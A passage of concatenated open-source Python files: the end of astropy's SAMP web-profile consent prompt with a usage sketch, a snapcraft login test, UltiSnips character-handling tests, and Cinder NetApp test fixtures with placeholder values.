is requesting to be registered with the SAMP Hub.
Pay attention that if you permit its registration, such
application will acquire all current user privileges, like
file read/write.
Do you give your consent? [yes|no]"""
print(text)
answer = input(">>> ")
queue.put(answer.lower() in ["yes", "y"])
| pllim/astropy | astropy/samp/web_profile.py | Python | bsd-3-clause | 5,583 |
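A minimal sketch of standing this server up directly, assuming astropy is installed and port 21012 (the conventional Web Profile port) is free. In normal use astropy.samp.SAMPHubServer creates and drives this server itself, so this is for illustration only; the client id is hypothetical.

from astropy.samp.web_profile import WebProfileXMLRPCServer

server = WebProfileXMLRPCServer(('127.0.0.1', 21012), log=None)
server.add_client('cli#hub-client-1')  # hypothetical client id

# server.serve_forever() would block; the hub normally runs this loop in a
# background thread and calls remove_client()/shutdown() on teardown.
server.server_close()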
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import integration_tests
class LoginLogoutTestCase(integration_tests.StoreTestCase):
def test_successful_login(self):
self.addCleanup(self.logout)
self.login(expect_success=True)
def test_failed_login(self):
self.login(
'[email protected]',
'wrongpassword',
expect_success=False)
| tsdgeos/snapcraft | integration_tests/test_store_login_logout.py | Python | gpl-3.0 | 1,032 |
# encoding: utf-8
from test.vim_test_case import VimTestCase as _VimTest
from test.constant import *
from test.util import running_on_windows
# Quotes in Snippets {{{#
# Test for Bug #774917
def _snip_quote(qt):
return (
('te' + qt + 'st', 'Expand me' + qt + '!', 'test: ' + qt),
('te', 'Bad', ''),
)
class Snippet_With_SingleQuote(_VimTest):
snippets = _snip_quote("'")
keys = "te'st" + EX
wanted = "Expand me'!"
class Snippet_With_SingleQuote_List(_VimTest):
snippets = _snip_quote("'")
keys = 'te' + LS + '2\n'
wanted = "Expand me'!"
class Snippet_With_DoubleQuote(_VimTest):
snippets = _snip_quote('"')
keys = 'te"st' + EX
wanted = "Expand me\"!"
class Snippet_With_DoubleQuote_List(_VimTest):
snippets = _snip_quote('"')
keys = 'te' + LS + '2\n'
wanted = "Expand me\"!"
# End: Quotes in Snippets #}}}
# Trailing whitespace {{{#
class RemoveTrailingWhitespace(_VimTest):
snippets = ('test', """Hello\t ${1:default}\n$2""", '', 's')
wanted = """Hello\nGoodbye"""
keys = 'test' + EX + BS + JF + 'Goodbye'
class TrimSpacesAtEndOfLines(_VimTest):
snippets = ('test', """next line\n\nshould be empty""", '', 'm')
wanted = """\tnext line\n\n\tshould be empty"""
keys = '\ttest' + EX
class DoNotTrimSpacesAtEndOfLinesByDefault(_VimTest):
snippets = ('test', """next line\n\nshould be empty""", '', '')
wanted = """\tnext line\n\t\n\tshould be empty"""
keys = '\ttest' + EX
class LeaveTrailingWhitespace(_VimTest):
snippets = ('test', """Hello \t ${1:default}\n$2""")
wanted = """Hello \t \nGoodbye"""
keys = 'test' + EX + BS + JF + 'Goodbye'
# End: Trailing whitespace #}}}
# Newline in default text {{{#
# Tests for bug 616315 #
class TrailingNewline_TabStop_NLInsideStuffBehind(_VimTest):
snippets = ('test', r"""
x${1:
}<-behind1
$2<-behind2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj<-behind1
k<-behind2"""
class TrailingNewline_TabStop_JustNL(_VimTest):
snippets = ('test', r"""
x${1:
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_EndNL(_VimTest):
snippets = ('test', r"""
x${1:a
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_StartNL(_VimTest):
snippets = ('test', r"""
x${1:
a}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_EndStartNL(_VimTest):
snippets = ('test', r"""
x${1:
a
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_NotEndStartNL(_VimTest):
snippets = ('test', r"""
x${1:a
a}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_ExtraNL_ECR(_VimTest):
snippets = ('test', r"""
x${1:a
a}
$2
""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k
"""
class _MultiLineDefault(_VimTest):
snippets = ('test', r"""
x${1:a
b
c
d
e
f}
$2""")
class MultiLineDefault_Jump(_MultiLineDefault):
keys = 'test' + EX + JF + 'y'
wanted = """
xa
b
c
d
e
f
y"""
class MultiLineDefault_Type(_MultiLineDefault):
keys = 'test' + EX + 'z' + JF + 'y'
wanted = """
xz
y"""
class MultiLineDefault_BS(_MultiLineDefault):
keys = 'test' + EX + BS + JF + 'y'
wanted = """
x
y"""
# End: Newline in default text #}}}
# Umlauts and Special Chars {{{#
class _UmlautsBase(_VimTest):
# SendKeys can't send UTF characters
skip_if = lambda self: running_on_windows()
class Snippet_With_Umlauts_List(_UmlautsBase):
snippets = _snip_quote('ü')
keys = 'te' + LS + '2\n'
wanted = 'Expand meü!'
class Snippet_With_Umlauts(_UmlautsBase):
snippets = _snip_quote('ü')
keys = 'teüst' + EX
wanted = 'Expand meü!'
class Snippet_With_Umlauts_TypeOn(_UmlautsBase):
snippets = ('ül', 'üüüüüßßßß')
keys = 'te ül' + EX + 'more text'
wanted = 'te üüüüüßßßßmore text'
class Snippet_With_Umlauts_OverwriteFirst(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + 'more text' + JF + JF + 'end'
wanted = 'te üü more text üü helloßß\nüüüüend'
class Snippet_With_Umlauts_OverwriteSecond(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + JF + 'more text' + JF + 'end'
wanted = 'te üü world üü more textßß\nüüüüend'
class Snippet_With_Umlauts_OverwriteNone(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + JF + JF + 'end'
wanted = 'te üü world üü helloßß\nüüüüend'
class Snippet_With_Umlauts_Mirrors(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü $1')
keys = 'te ül' + EX + 'hello'
wanted = 'te üü hello üü hello'
class Snippet_With_Umlauts_Python(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü `!p snip.rv = len(t[1])*"a"`')
keys = 'te ül' + EX + 'hüüll'
wanted = 'te üü hüüll üü aaaaa'
class UmlautsBeforeTriggerAndCharsAfter(_UmlautsBase):
snippets = ('trig', 'success')
keys = 'ööuu trig b' + 2 * ARR_L + EX
wanted = 'ööuu success b'
class NoUmlautsBeforeTriggerAndCharsAfter(_UmlautsBase):
snippets = ('trig', 'success')
keys = 'oouu trig b' + 2 * ARR_L + EX
wanted = 'oouu success b'
# End: Umlauts and Special Chars #}}}
| Insanityandme/dotfiles | vim/bundle/ultisnips/test/test_Chars.py | Python | unlicense | 5,521 |
# Copyright (c) - 2014, Clinton Knight All rights reserved.
# Copyright (c) - 2015, Alex Meade. All Rights Reserved.
# Copyright (c) - 2015, Rushil Chugh. All Rights Reserved.
# Copyright (c) - 2015, Tom Barron. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.volume import configuration as conf
import cinder.volume.drivers.netapp.options as na_opts
ISCSI_FAKE_LUN_ID = 1
ISCSI_FAKE_IQN = 'iqn.1993-08.org.debian:01:10'
ISCSI_FAKE_ADDRESS = '10.63.165.216'
ISCSI_FAKE_PORT = '2232'
ISCSI_FAKE_VOLUME = {'id': 'fake_id'}
ISCSI_FAKE_TARGET = {}
ISCSI_FAKE_TARGET['address'] = ISCSI_FAKE_ADDRESS
ISCSI_FAKE_TARGET['port'] = ISCSI_FAKE_PORT
ISCSI_FAKE_VOLUME = {'id': 'fake_id', 'provider_auth': 'None stack password'}
FC_ISCSI_TARGET_INFO_DICT = {'target_discovered': False,
'target_portal': '10.63.165.216:2232',
'target_iqn': ISCSI_FAKE_IQN,
'target_lun': ISCSI_FAKE_LUN_ID,
'volume_id': ISCSI_FAKE_VOLUME['id'],
'auth_method': 'None', 'auth_username': 'stack',
'auth_password': 'password'}
VOLUME_NAME = 'fake_volume_name'
VOLUME_ID = 'fake_volume_id'
VOLUME_TYPE_ID = 'fake_volume_type_id'
VOLUME = {
'name': VOLUME_NAME,
'size': 42,
'id': VOLUME_ID,
'host': 'fake_host@fake_backend#fake_pool',
'volume_type_id': VOLUME_TYPE_ID,
}
SNAPSHOT_NAME = 'fake_snapshot_name'
SNAPSHOT_ID = 'fake_snapshot_id'
SNAPSHOT = {
'name': SNAPSHOT_NAME,
'id': SNAPSHOT_ID,
'volume_id': VOLUME_ID,
'volume_name': VOLUME_NAME,
'volume_size': 42,
}
QOS_SPECS = {}
EXTRA_SPECS = {}
MAX_THROUGHPUT = '21734278B/s'
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
LEGACY_EXTRA_SPECS = {'netapp:qos_policy_group': QOS_POLICY_GROUP_NAME}
LEGACY_QOS = {
'policy_name': QOS_POLICY_GROUP_NAME,
}
QOS_POLICY_GROUP_SPEC = {
'max_throughput': MAX_THROUGHPUT,
'policy_name': 'openstack-%s' % VOLUME_ID,
}
QOS_POLICY_GROUP_INFO_NONE = {'legacy': None, 'spec': None}
QOS_POLICY_GROUP_INFO = {'legacy': None, 'spec': QOS_POLICY_GROUP_SPEC}
LEGACY_QOS_POLICY_GROUP_INFO = {
'legacy': LEGACY_QOS,
'spec': None,
}
INVALID_QOS_POLICY_GROUP_INFO = {
'legacy': LEGACY_QOS,
'spec': QOS_POLICY_GROUP_SPEC,
}
QOS_SPECS_ID = 'fake_qos_specs_id'
QOS_SPEC = {'maxBPS': 21734278}
OUTER_BACKEND_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'back-end',
}
OUTER_FRONTEND_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'front-end',
}
OUTER_BOTH_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'both',
}
VOLUME_TYPE = {'id': VOLUME_TYPE_ID, 'qos_specs_id': QOS_SPECS_ID}
def create_configuration():
config = conf.Configuration(None)
config.append_config_values(na_opts.netapp_connection_opts)
config.append_config_values(na_opts.netapp_transport_opts)
config.append_config_values(na_opts.netapp_basicauth_opts)
config.append_config_values(na_opts.netapp_provisioning_opts)
return config
def create_configuration_7mode():
config = create_configuration()
config.append_config_values(na_opts.netapp_7mode_opts)
return config
def create_configuration_cmode():
config = create_configuration()
config.append_config_values(na_opts.netapp_cluster_opts)
return config
| Hybrid-Cloud/cinder | cinder/tests/unit/volume/drivers/netapp/fakes.py | Python | apache-2.0 | 3,984 |
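A hedged sketch of how these fixtures are typically consumed from a unit test, assuming a Cinder development checkout; the option read below is one of the registered netapp_transport_opts, and the mutation pattern is illustrative rather than taken from Cinder's own tests.

from cinder.tests.unit.volume.drivers.netapp import fakes as na_fakes

config = na_fakes.create_configuration_cmode()
print(config.netapp_transport_type)  # default transport registered by na_opts

# Copy the shared fixtures before mutating them so other tests stay unaffected.
volume = dict(na_fakes.VOLUME)
volume['size'] = 100
qos_info = dict(na_fakes.QOS_POLICY_GROUP_INFO)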